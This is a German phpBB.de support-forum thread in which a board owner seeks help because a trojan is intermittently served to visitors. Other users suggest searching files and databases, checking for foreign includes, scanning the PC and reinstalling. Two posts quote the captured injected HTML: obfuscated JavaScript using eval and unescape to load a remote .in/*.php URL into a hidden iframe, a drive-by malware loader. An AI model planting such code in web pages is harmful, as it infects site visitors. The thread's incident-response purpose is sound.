phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Trojaner wird beim Besuch geladen

https://www.phpbb.de/community/viewtopic.php?t=218623

Seite 1 von 1

Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 17:51
von Ttahl
Hallo,
wenn ich mein Forum besuche, dann wird ab und zu einer Trojaner geladen. Wenn der Trojaner geladen wird, dann ist folgender Code im Quelltext zu finden.

Code: Alles auswählen

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7123" height="1" width="1"><img src="about:blank" onError='ecxvrok=unescape("%27");bcnkvj=eval("document.getElementById("+ecxvrok+"ysryeyi"+ecxvrok+").src=unescape("+ecxvrok+"%68%74%74%70%3A%2F%2F"+ecxvrok+")+document.getElementById("+ecxvrok+"7123"+ecxvrok+").id+unescape("+ecxvrok+"%2E%69%6E%2F"+ecxvrok+")+"+ecxvrok+"1318777087"+ecxvrok+"+unescape("+ecxvrok+"%2E%70%68%70"+ecxvrok+")");document.getElementById("ysryeyi").src=bcnkvj' style="width:300;height:300;border:0px;"><iframe id="ysryeyi" src="about:blank"></iframe></div>
Ich habe nun alle Dateien auf den Desktop geladen und nach dem Code durchsucht, doch ohne Erfolg. Welchen Ansatzpunkt habe ich nun, um die infizierten Dateien zu finden?

Den Artikel - "Mein Forum wurde gehackt" werde ich natürlich auch arbeiten, doch das werde ich wohl erst am Dienstag schaffen. Bis dahin würde ich gerne die Infektion beseitigen.

Re: Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 17:56
von BNa
Durchsuche mit einem Editor, der eine dateiübergreifende Suche erlaubt, alle Deine Board-Dateien nach

Code: Alles auswählen

ecxvrok

Re: Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 18:18
von Ttahl
Ich habe eine Suche mit Dreamweaver und mit der erweiterten Suche von gedit nach dem Ausdruck gesucht. Er wurde in keiner Datei gefunden.

Re: Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 18:29
von BNa
Benutze Notepad++ dazu

Re: Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 18:40
von Ttahl
Jetzt habe ich mit Notepad++ eine Suche
  • "Find in Files",
    Find what = ecxvrok,
    Filters = *.*,
    "in all sub-folders"
Keine Treffer. Das "komische" ist auch, dass bei mir uns anderen die Trojaner Warnung nur ab und zu kommt. Die meiste Zeit bleibt der Quelltext "clean".

Re: Trojaner wird beim Besuch geladen

Verfasst: 16.10.2011 23:18
von BNa
Kann sein, das der Code via SQL generiert wird. Durchsuche alle Datenbanktabellen nach ecxvrok.
Ferner kann es ein JS oder php include() sein. Prüfe daher alle Dateien auf includes

templates

Code: Alles auswählen

<script type="text/javascript" src="http://www.nichtdeinboard.de/fremdlink.js"></script>
php

Code: Alles auswählen

include('http://www.nichtdeinboard.de/fremdlink.php'); 

Code: Alles auswählen

include('http://www.nichtdeinboard.de/fremdlink.js');  
Oder lande einen Glückstreffer mit der Suche nach

Code: Alles auswählen

http://

Re: Trojaner wird beim Besuch geladen

Verfasst: 17.10.2011 15:59
von Ttahl
Die Suche in den Datenbanken brachte keinen Erfolg. Liegt auch daran, dass sich der Code ständig ändert.
Gerade war folgender Code im Quelltext vorhanden

Code: Alles auswählen

<br /><div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="3712" height="1" width="1"><img src="about:blank" onError='sluslsc=unescape("%27");vsrklu=eval("document.getElementById("+sluslsc+"bmbhjtk"+sluslsc+").src=unescape("+sluslsc+"%68%74%74%70%3A%2F%2F"+sluslsc+")+document.getElementById("+sluslsc+"3712"+sluslsc+").id+unescape("+sluslsc+"%2E%69%6E%2F"+sluslsc+")+"+sluslsc+"1318858861"+sluslsc+"+unescape("+sluslsc+"%2E%70%68%70"+sluslsc+")");document.getElementById("bmbhjtk").src=vsrklu' style="width:300;height:300;border:0px;"><iframe id="bmbhjtk" src="about:blank"></iframe></div>
Die Suche nach den beständigen Werten wie z.B. "%68%74%74%70%3A%2F" brachte auch keinen Erfolg.

Wie meinst du das mit "http://www.nichtdeinboard.de/fremdlink.js" woher bekomme ich die URL her. Das einzige, was ich sehe ist der o.g Code und die Meldung von antivir, was eine uebani.js als infiziert meldet

Re: Trojaner wird beim Besuch geladen

Verfasst: 17.10.2011 16:32
von Mahony
Hallo
Wenn bei dir (im Forum) Dateien geändert wurden, dann liegt es mit großer Wahrscheinlichkeit daran, dass DU dir (auf deinem PC) einen Virus/Trojaner/Malware eingefangen hast. Die erste Maßnahme sollte also lauten, dass du deinen PC nach Viren|Trojanern|Malware scannst. Natürlich sollten im gleichen Zuge auch alle Passwörter geändert werden und frische phpBB3.0.x-Dateien verwendet werden.
Siehe dazu auch KB:gehackt


Grüße: Mahony

Re: Trojaner wird beim Besuch geladen

Verfasst: 17.10.2011 18:14
von BNa
Ttahl hat geschrieben:Wie meinst du das mit "http://www.nichtdeinboard.de/fremdlink.js" woher bekomme ich die URL her.
Das meint, das Du nach der Syntax suchen musst. Es sollte ein Fremdlink sein, also ein Link, der nach ausserhalb Deines Boards führt.
Ttahl hat geschrieben:Das einzige, was ich sehe ist der o.g Code und die Meldung von antivir, was eine uebani.js als infiziert meldet
Wunderbar. Dann suche dateiübergreifend nach uebani.js.

Wenn es allerdings eine Infektion Deines Rechners sein sollte oder Du nichts Eindeutiges finden solltest,
befolge bitte alle Punkte im Link, den Dir Mahony in seinem Post gegeben hat.
KB:gehackt
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de